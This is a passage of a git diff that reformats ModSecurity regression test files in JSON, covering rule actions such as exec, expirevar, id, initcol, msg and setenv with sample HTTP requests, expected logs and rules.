"method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "audit_log":"", - "debug_log":"Running script... test-cases/data/test.lua", - "error_log":"" + "expected": { + "debug_log": "Running script... test-cases/data/test.lua", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"@contains PHPSESSID\" \"id:1,exec:test-cases/data/test.lua\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: exec (3/3)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: exec (3/3)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "audit_log":"", - "debug_log":"Running script... test-cases/data/match.lua", - "error_log":"" + "expected": { + "debug_log": "Running script... test-cases/data/match.lua", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"@contains PHPSESSID\" \"id:1,exec:test-cases/data/match.lua\"" ] } ] - diff --git a/test/test-cases/regression/action-expirevar.json b/test/test-cases/regression/action-expirevar.json index 5c9d4ddfd4..f105a1929d 100644 --- a/test/test-cases/regression/action-expirevar.json +++ b/test/test-cases/regression/action-expirevar.json @@ -1,29 +1,42 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing expirevar action (1/x) - ip, expire later", - "expected":{ - "debug_log": "Saving msg: mycount1 is 100" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing expirevar action (1/x) - ip, expire later", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value", - "method":"GET" + "uri": "/?key=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Saving msg: mycount1 is 100", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"initcol:ip='127.0.0.1',id:5000,phase:1\"", "SecRule ARGS \"@rx value\" \"id:'5001',phase:2,setvar:ip.mycount1=100,expirevar:ip.mycount1=60,pass\"", @@ -31,30 +44,43 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing expirevar action (2/x) - ip, expire immediately", - "expected":{ - "debug_log": "Saving msg: mycount1 is " - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing expirevar action (2/x) - ip, expire immediately", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/?key=value", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Saving msg: mycount1 is ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"initcol:ip='127.0.0.1',id:5010,phase:1\"", "SecRule ARGS \"@rx value\" \"id:'5011',phase:2,setvar:ip.mycount1=100,expirevar:ip.mycount1=0,pass\"", @@ -62,30 +88,43 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing expirevar action (3/x) session, expire later", - "expected":{ - "debug_log": "Saving msg: mycount1 is 12" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing expirevar action (3/x) session, expire later", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value", - "method":"GET" + "uri": "/?key=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Saving msg: mycount1 is 12", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx .\" \"id:5150,phase:2,pass,setsid:sess1234\"", "SecRule ARGS \"@rx value\" \"id:5151,phase:2,pass,setvar:session.mycount1=12,expirevar:session.mycount1=30\"", @@ -93,30 +132,43 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing expirevar action (4/x) session, expire immediately", - "expected":{ - "debug_log": "Saving msg: mycount1 is" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing expirevar action (4/x) session, expire immediately", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/?key=value", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Saving msg: mycount1 is", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx .\" \"id:5150,phase:2,pass,setsid:sess1234\"", "SecRule ARGS \"@rx value\" \"id:5151,phase:2,pass,setvar:session.mycount1=12,expirevar:session.mycount1=0\"", diff --git a/test/test-cases/regression/action-id.json b/test/test-cases/regression/action-id.json index 9f9453c7e9..39370d30e5 100644 --- a/test/test-cases/regression/action-id.json +++ b/test/test-cases/regression/action-id.json @@ -1,264 +1,276 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (1/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (1/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200, "parser_error": "The input \"111111111111222222222222222222222222222333333333333333333333333333444444444444444444444444444444555555555555555555555555666666666666666666666666666666666666666666\" does not seems to be a valid rule id." }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:111111111111222222222222222222222222222333333333333333333333333333444444444444444444444444444444555555555555555555555555666666666666666666666666666666666666666666,phase:2,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (2/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (2/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200, "parser_error": "File: action-id.json. Line: 2. Column: 56. Expecting an action, got: id:-1,phase:2,pass,t:trim\"" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:-1,phase:2,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (3/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (3/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log": " t:trim: \"value2\"" + "expected": { + "debug_log": " t:trim: \"value2\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:1,phase:3,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (4/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (4/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log": " t:trim: \"value2\"" + "expected": { + "debug_log": " t:trim: \"value2\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:'1',phase:3,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (5/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (5/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200, "parser_error": "action-id.json. Line: 2. Column: 56. Expecting an action, got: id:'1,phase:2,pass,t:trim\"" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:'1,phase:2,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (6/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (6/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200, "parser_error": "action-id.json. Line: 2. Column: 56. Expecting an action, got: ',phase:2,pass,t:trim\"" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:1',phase:2,pass,t:trim\"" ] diff --git a/test/test-cases/regression/action-initcol.json b/test/test-cases/regression/action-initcol.json index 5051f2e6a5..3ab79876b5 100644 --- a/test/test-cases/regression/action-initcol.json +++ b/test/test-cases/regression/action-initcol.json @@ -1,30 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing initcol action", - "expected":{ - "debug_log": "Saving variable: IP:auth_attempt with value: " + "enabled": 1, + "version_min": 300000, + "title": "Testing initcol action", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Saving variable: IP:auth_attempt with value: ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setvar:tx.ua_hash=%{matched_var},nolog,pass\"", "SecRule &TX:REAL_IP \"@eq 0\" \"id:'900021',phase:1,t:none,initcol:global=global,initcol:ip=%{remote_addr}_%{tx.ua_hash},setvar:tx.real_ip=%{remote_addr},nolog,pass\"", diff --git a/test/test-cases/regression/action-msg.json b/test/test-cases/regression/action-msg.json index 6933be8aa5..34e9fe5fed 100644 --- a/test/test-cases/regression/action-msg.json +++ b/test/test-cases/regression/action-msg.json @@ -1,115 +1,119 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: msg (this test is not really testing it)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: msg (this test is not really testing it)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving msg: This is a test, text\/html,application", - "error_log":"" + "expected": { + "debug_log": "Saving msg: This is a test, text/html,application", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, - { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: msg - variable expansion", - "client":{ - "ip":"200.249.12.31", - "port":2313 + { + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: msg - variable expansion", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving msg: This is a test: PHPSESSID ops", - "error_log":"" + "expected": { + "debug_log": "Saving msg: This is a test: PHPSESSID ops", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@rx PHPSESSID\" \"id:1,capture,t:lowercase,t:none,msg:'This is a test: %{TX.0}% ops'\"", "SecRule TX \"@rx to_test\" \"id:2,t:lowercase,capture,t:none\"" diff --git a/test/test-cases/regression/action-setenv.json b/test/test-cases/regression/action-setenv.json index 2bbe967a4d..e884f00247 100644 --- a/test/test-cases/regression/action-setenv.json +++ b/test/test-cases/regression/action-setenv.json @@ -1,93 +1,132 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing setsid action (1/3)", - "expected":{ - "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "enabled": 1, + "version_min": 300000, + "title": "Testing setsid action (1/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"^(.*)$\" \"id:'900018',phase:2,setenv:'variable=%{matched_var}',pass\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing setenv action (2/3)", - "expected":{ - "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "enabled": 1, + "version_min": 300000, + "title": "Testing setenv action (2/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"^(.*)$\" \"id:'900018',phase:2,setenv:variable=%{matched_var},pass\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing setenv action (3/3)", - "expected":{ - "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120==test=test" + "enabled": 1, + "version_min": 300000, + "title": "Testing setenv action (3/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "body": [ + "" + 